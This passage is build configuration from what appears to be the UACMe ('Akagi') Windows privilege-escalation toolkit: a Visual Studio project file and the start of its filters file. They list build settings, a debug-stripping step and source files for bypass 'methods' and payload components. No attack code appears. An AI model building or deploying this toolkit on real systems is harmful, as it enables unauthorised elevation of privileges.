<Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <EnablePREfast>false</EnablePREfast>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <Version>6.1</Version>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n      <PreprocessorDefinitions>useRc32;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <EnablePREfast>false</EnablePREfast>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <Version>6.1</Version>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    
<ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n      <PreprocessorDefinitions>useRc32;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <EnablePREfast>false</EnablePREfast>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <Version>6.1</Version>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <EnablePREfast>false</EnablePREfast>\n      
<AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <Version>6.1</Version>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <CompileAs>CompileAsC</CompileAs>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <EnablePREfast>false</EnablePREfast>\n      <DebugInformationFormat>None</DebugInformationFormat>\n      <StringPooling>true</StringPooling>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <ControlFlowGuard>false</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      
<OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <Version>6.1</Version>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n      <PreprocessorDefinitions>useRc32;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <CompileAs>CompileAsC</CompileAs>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <EnablePREfast>true</EnablePREfast>\n      <DebugInformationFormat>None</DebugInformationFormat>\n      <StringPooling>true</StringPooling>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <CallingConvention>StdCall</CallingConvention>\n      <ControlFlowGuard>false</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      
<OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <Version>6.1</Version>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n      <PreprocessorDefinitions>useRc32;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi32.exe</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <CompileAs>CompileAsC</CompileAs>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <EnablePREfast>true</EnablePREfast>\n      <DebugInformationFormat>None</DebugInformationFormat>\n      <StringPooling>true</StringPooling>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <CallingConvention>StdCall</CallingConvention>\n      <ControlFlowGuard>false</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      
<GenerateDebugInformation>No</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <Version>6.1</Version>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n      <PreprocessorDefinitions>useRc32;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi32.exe</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <CompileAs>CompileAsC</CompileAs>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <EnablePREfast>false</EnablePREfast>\n      <StringPooling>true</StringPooling>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <ControlFlowGuard>false</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      
<GenerateDebugInformation>false</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <Version>6.1</Version>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <CompileAs>CompileAsC</CompileAs>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <EnablePREfast>true</EnablePREfast>\n      <StringPooling>true</StringPooling>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <ControlFlowGuard>false</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      
<SetChecksum>true</SetChecksum>\n      <MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <Version>6.1</Version>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi64.exe</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <CompileAs>CompileAsC</CompileAs>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <EnablePREfast>true</EnablePREfast>\n      <StringPooling>true</StringPooling>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <ControlFlowGuard>false</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      
<MinimumRequiredVersion>6.1</MinimumRequiredVersion>\n      <Version>6.1</Version>\n      <ModuleDefinitionFile>\n      </ModuleDefinitionFile>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n    </Link>\n    <ResourceCompile />\n    <ResourceCompile />\n    <ResourceCompile>\n      <ShowProgress>true</ShowProgress>\n    </ResourceCompile>\n    <Manifest>\n      <AdditionalManifestFiles>akagi.manifest</AdditionalManifestFiles>\n    </Manifest>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi64.exe</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\Shared\\cmdline.c\" />\n    <ClCompile Include=\"..\\Shared\\hde\\hde64.c\" />\n    <ClCompile Include=\"..\\Shared\\ldr.c\" />\n    <ClCompile Include=\"..\\Shared\\strtoul.c\" />\n    <ClCompile Include=\"..\\Shared\\u64tohex.c\" />\n    <ClCompile Include=\"..\\Shared\\u64tostr.c\" />\n    <ClCompile Include=\"..\\Shared\\ultohex.c\" />\n    <ClCompile Include=\"..\\Shared\\ultostr.c\" />\n    <ClCompile Include=\"..\\Shared\\windefend.c\" />\n    <ClCompile Include=\"..\\Shared\\_filename.c\" />\n    <ClCompile Include=\"..\\shared\\_strcat.c\" />\n    <ClCompile Include=\"..\\shared\\_strcmp.c\" />\n    <ClCompile Include=\"..\\shared\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\shared\\_strcpy.c\" />\n    <ClCompile Include=\"..\\shared\\_strend.c\" />\n    <ClCompile Include=\"..\\shared\\_strlen.c\" />\n    <ClCompile Include=\"..\\shared\\_strncmp.c\" />\n    <ClCompile Include=\"..\\shared\\_strncmpi.c\" />\n    <ClCompile Include=\"..\\shared\\_strncpy.c\" />\n    <ClCompile Include=\"..\\Shared\\_strstri.c\" />\n    <ClCompile Include=\"aic.c\" />\n    <ClCompile Include=\"appinfo\\x64\\appinfo64.c\" />\n    <ClCompile Include=\"appinfo\\x86-32\\appinfo32.c\" />\n    <ClCompile Include=\"console.c\" />\n    <ClCompile Include=\"fusutil.c\" />\n    <ClCompile Include=\"main.c\" 
/>\n    <ClCompile Include=\"makecab.c\" />\n    <ClCompile Include=\"compress.c\" />\n    <ClCompile Include=\"methods\\antonioCoco.c\" />\n    <ClCompile Include=\"methods\\api0cradle.c\" />\n    <ClCompile Include=\"methods\\azagarampur.c\" />\n    <ClCompile Include=\"methods\\dwells.c\" />\n    <ClCompile Include=\"methods\\shellsup.c\" />\n    <ClCompile Include=\"methods\\hakril.c\" />\n    <ClCompile Include=\"methods\\hybrids.c\" />\n    <ClCompile Include=\"methods\\comsup.c\" />\n    <ClCompile Include=\"methods\\methods.c\" />\n    <ClCompile Include=\"methods\\rinn.c\" />\n    <ClCompile Include=\"methods\\tyranid.c\" />\n    <ClCompile Include=\"methods\\wusa.c\" />\n    <ClCompile Include=\"methods\\zcgonvh.c\" />\n    <ClCompile Include=\"pcasvc\\w7\\x64\\pcasvc7_64.c\" />\n    <ClCompile Include=\"pcasvc\\w7\\x86-32\\pcasvc7_32.c\" />\n    <ClCompile Include=\"pcasvc\\w8_10\\x64\\pcasvc64.c\" />\n    <ClCompile Include=\"pcasvc\\w8_10\\x86-32\\pcasvc32.c\" />\n    <ClCompile Include=\"stub.c\" />\n    <ClCompile Include=\"sup.c\" />\n    <ClCompile Include=\"tests\\test.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\Shared\\hde\\hde64.h\" />\n    <ClInclude Include=\"..\\Shared\\hde\\pstdint.h\" />\n    <ClInclude Include=\"..\\Shared\\hde\\table64.h\" />\n    <ClInclude Include=\"..\\Shared\\ldr.h\" />\n    <ClInclude Include=\"..\\shared\\minirtl.h\" />\n    <ClInclude Include=\"..\\shared\\rtltypes.h\" />\n    <ClInclude Include=\"..\\Shared\\shared.h\" />\n    <ClInclude Include=\"..\\Shared\\windefend.h\" />\n    <ClInclude Include=\"..\\Shared\\_filename.h\" />\n    <ClInclude Include=\"aic.h\" />\n    <ClInclude Include=\"compress.h\" />\n    <ClInclude Include=\"console.h\" />\n    <ClInclude Include=\"fusutil.h\" />\n    <ClInclude Include=\"global.h\" />\n    <ClInclude Include=\"methods\\elvint.h\" />\n    <ClInclude Include=\"makecab.h\" />\n    <ClInclude Include=\"encresource.h\" />\n    <ClInclude 
Include=\"methods\\comsup.h\" />\n    <ClInclude Include=\"methods\\routines.h\" />\n    <ClInclude Include=\"methods\\methods.h\" />\n    <ClInclude Include=\"resource.h\" />\n    <ClInclude Include=\"stub.h\" />\n    <ClInclude Include=\"sup.h\" />\n    <ClInclude Include=\"tests\\test.h\" />\n    <ClInclude Include=\"uas.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"bin32res.rc\">\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|x64'\">true</ExcludedFromBuild>\n    </ResourceCompile>\n    <ResourceCompile Include=\"bin64res.rc\">\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">true</ExcludedFromBuild>\n   
   <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|Win32'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">true</ExcludedFromBuild>\n      <ExcludedFromBuild Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|x64'\">true</ExcludedFromBuild>\n    </ResourceCompile>\n    <ResourceCompile Include=\"Resource.rc\" />\n  </ItemGroup>\n  <ItemGroup>\n    <Image Include=\"akagi.ico\" />\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"export.def\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Akagi/uacme.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{1caf2f34-af91-46be-aa2e-1893b0be628c}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"testunits\">\n      <UniqueIdentifier>{c4fc1dcf-e216-4458-a377-e7203d627128}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"Source Files\\methods\">\n      <UniqueIdentifier>{6a18d07e-0b0d-455a-b4c2-1379f5934479}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"ldr\">\n      <UniqueIdentifier>{751f7002-5a6c-4d2e-9296-3b8132e640f8}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"appinfo\">\n      <UniqueIdentifier>{b3b23f8d-a79f-4195-85a2-ce0665938c27}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"hde\">\n      <UniqueIdentifier>{1df8392c-a609-47c6-b987-44e7268833eb}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"pcasvc\">\n      <UniqueIdentifier>{bf8226e8-2fd3-40d0-be5f-d04777becad3}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"pcasvc\\w7\">\n      <UniqueIdentifier>{b9dae49c-a48a-4bca-9c20-5ee013126ee8}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"pcasvc\\w8_10\">\n      
<UniqueIdentifier>{3b1593e5-eb08-4b0d-a8a4-362b39344711}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"sup.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strcmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strncmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\strtoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"makecab.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"compress.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\ultohex.c\">\n      <Filter>minirtl</Filter>\n  
  </ClCompile>\n    <ClCompile Include=\"tests\\test.c\">\n      <Filter>testunits</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\methods.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\hybrids.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\ldr.c\">\n      <Filter>ldr</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\tyranid.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\wusa.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"aic.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\hakril.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile 